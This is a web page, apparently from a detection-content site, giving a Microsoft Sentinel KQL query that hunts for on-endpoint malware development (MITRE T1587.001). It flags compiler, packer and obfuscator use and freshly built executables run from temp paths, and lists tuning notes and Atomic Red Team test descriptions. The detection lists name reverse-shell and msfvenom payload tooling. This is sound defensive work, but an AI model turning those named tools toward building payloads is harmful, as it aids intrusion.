Detect Malware in Microsoft Sentinel
Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors, packers, C2 protocols, and the creation of infected removable media. Because malware development occurs primarily on adversary-controlled infrastructure before deployment, defenders cannot directly observe this activity. Detection must pivot to identifying proxies: compilation and build tool activity on non-developer endpoints, use of known obfuscation and packing tools, characteristics of freshly compiled executables executing immediately after creation, and behavioral patterns consistent with malware testing (sandbox evasion checks, anti-analysis routines). Threat actors such as Lazarus Group, APT29, Sandworm, Kimsuky, and Indrik Spider are known to develop bespoke malware to avoid commodity detection signatures.
MITRE ATT&CK
- Tactic
- Resource Development
- Technique
- T1587 Develop Capabilities
- Sub-technique
- T1587.001 Malware
- Canonical reference
- https://attack.mitre.org/techniques/T1587/001/
KQL Detection Query
let KnownCompilers = dynamic(["csc.exe", "vbc.exe", "msbuild.exe", "cl.exe", "link.exe", "rc.exe", "ilasm.exe", "csc.exe"]);
let KnownPackers = dynamic(["upx.exe", "upx", "themida", "enigmaprotector", "vmprotect", "pecompact", "aspack", "mpress"]);
let KnownObfuscators = dynamic(["confuserex", "obfuscar", "dotfuscator", ".netshrink", "reactornet", "codeprotector", "eazfuscator", "dnguard"]);
let MsfvEnomArtifacts = dynamic(["msfvenom", "msfconsole", "msfpayload", "metasploit", "msf_", "shell_reverse", "shell_bind"]);
let SuspiciousOutputPaths = dynamic(["\\Temp\\", "\\AppData\\Local\\Temp\\", "\\Users\\Public\\", "\\ProgramData\\"]);
// Branch 1: Compiler or build tool usage on endpoints not typical for development
let CompilerActivity = DeviceProcessEvents
| where Timestamp > ago(24h)
| where FileName has_any (KnownCompilers)
| where InitiatingProcessFileName !in~ ("devenv.exe", "MSBuild.exe", "dotnet.exe", "code.exe", "rider64.exe", "idea64.exe")
| extend DetectionBranch = "CompilerOnEndpoint"
| project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine,
InitiatingProcessFileName, InitiatingProcessCommandLine,
FolderPath, SHA256, DetectionBranch;
// Branch 2: Known packer or protector tool execution
let PackerActivity = DeviceProcessEvents
| where Timestamp > ago(24h)
| where FileName has_any (KnownPackers) or ProcessCommandLine has_any (KnownPackers)
| extend DetectionBranch = "PackerProtectorUsage"
| project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine,
InitiatingProcessFileName, InitiatingProcessCommandLine,
FolderPath, SHA256, DetectionBranch;
// Branch 3: Compile-then-execute pattern — new PE written then immediately run
let NewPEFiles = DeviceFileEvents
| where Timestamp > ago(24h)
| where ActionType == "FileCreated"
| where FileName endswith ".exe" or FileName endswith ".dll"
| where FolderPath has_any (SuspiciousOutputPaths)
| where InitiatingProcessFileName has_any (KnownCompilers)
| project FileTimestamp=Timestamp, DeviceName, CreatedFile=FileName, FilePath=FolderPath, InitiatingProcessFileName;
let NewPEExecution = DeviceProcessEvents
| where Timestamp > ago(24h)
| where FolderPath has_any (SuspiciousOutputPaths);
let CompileAndExecute = NewPEFiles
| join kind=inner (NewPEExecution) on DeviceName
| where Timestamp between (FileTimestamp .. (FileTimestamp + 5min))
| where FileName == CreatedFile
| extend DetectionBranch = "CompileAndImmediateExecute"
| project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine,
FilePath, DetectionBranch;
// Branch 4: Obfuscation tool usage
let ObfuscatorActivity = DeviceProcessEvents
| where Timestamp > ago(24h)
| where FileName has_any (KnownObfuscators) or ProcessCommandLine has_any (KnownObfuscators)
| extend DetectionBranch = "ObfuscatorUsage"
| project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine,
InitiatingProcessFileName, InitiatingProcessCommandLine,
FolderPath, SHA256, DetectionBranch;
// Union all branches
CompilerActivity
| union PackerActivity
| union CompileAndExecute
| union ObfuscatorActivity
| sort by Timestamp descDetects proxy indicators for on-system malware development and payload staging using Microsoft Defender for Endpoint DeviceProcessEvents and DeviceFileEvents tables. Four detection branches: (1) compiler or build tool execution (csc.exe, msbuild.exe, vbc.exe, ilasm.exe) initiated by non-IDE parent processes suggesting unauthorized code compilation; (2) known packer and protector tool execution (UPX, Themida, VMProtect, PECompact); (3) compile-then-execute pattern where a newly created PE file in a suspicious path is executed within five minutes of its creation by a compiler process; (4) .NET and native obfuscation tool usage (ConfuserEx, Dotfuscator, Eazfuscator). Because T1587.001 is a PRE-compromise technique occurring on adversary infrastructure, this detection targets the subset of cases where payload development, testing, or staging occurs on compromised endpoints.
Data Sources
Required Tables
False Positives & Tuning
- Legitimate software developers running csc.exe, msbuild.exe, or vbc.exe for application development on general-purpose endpoints without a dedicated developer workstation baseline
- IT automation and configuration management tools (Ansible, Puppet, Chef) that compile scripts or produce binaries as part of deployment pipelines — especially MSBuild invocations from SCCM or build agents
- Security researchers and red team members conducting authorized testing using Metasploit, packing tools, or obfuscators on approved lab machines
- .NET runtime just-in-time compilation artifacts that may superficially resemble csc.exe activity in certain monitoring configurations
- UPX-packed legitimate software where the vendor ships pre-packed binaries and deployment scripts unpack them during installation
Other platforms for T1587.001
Testing Methodology
Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1On-System C# Payload Compilation via csc.exe
Expected signal: Sysmon Event ID 1 (Process Create): Image=csc.exe, CommandLine containing '/out:' and path to %TEMP%, ParentImage=cmd.exe. Sysmon Event ID 11 (File Create): TargetFilename ending in df00tech_payload.exe in the Temp directory, initiated by csc.exe. Security Event ID 4688 (if command line auditing enabled) for the csc.exe invocation.
- Test 2Executable Packing with UPX
Expected signal: Sysmon Event ID 1: Process Create for upx.exe with CommandLine containing '--best' and the target file path. Sysmon Event ID 11: File modification event on df00tech_target.exe as UPX rewrites the PE in-place. Sysmon Event ID 3: Network connection to GitHub for the UPX download (if not pre-staged).
- Test 3In-Memory C# Compilation via PowerShell Add-Type
Expected signal: Sysmon Event ID 1: Process Create for powershell.exe with CommandLine containing 'Add-Type', '-TypeDefinition', and 'CSharpCodeProvider' (internal). PowerShell ScriptBlock Log Event ID 4104 capturing the full Add-Type invocation including the embedded C# source. Temporary .dll files may be written to %TEMP% by the CodeDom compiler with random names before being loaded and deleted.
- Test 4Metasploit msfvenom Payload Generation Simulation
Expected signal: Sysmon for Linux Event ID 1 (if deployed) or auditd execve records capturing the msfvenom command invocation. The string 'msfvenom' and 'reverse_tcp' in the command line are the primary indicators. If msfvenom is present and executes, an ELF binary is created in /tmp, triggering file creation events.
References (12)
- https://attack.mitre.org/techniques/T1587/001/
- https://attack.mitre.org/techniques/T1027/002/
- https://attack.mitre.org/techniques/T1027/004/
- https://www.mandiant.com/resources/blog/mandiant-apt1-report
- https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
- https://learn.microsoft.com/en-us/defender-endpoint/advanced-hunting-devicefileevents-table
- https://learn.microsoft.com/en-us/defender-endpoint/advanced-hunting-deviceprocessevents-table
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1587.001/T1587.001.md
- https://github.com/upx/upx
- https://docs.metasploit.com/docs/using-metasploit/basics/how-to-use-msfvenom.html
- https://learn.microsoft.com/en-us/dotnet/api/microsoft.csharp.csharpcodeprovider
- https://github.com/yck1509/ConfuserEx
Unlock Pro Content
Get the full detection package for T1587.001 including response playbook, investigation guide, and atomic red team tests.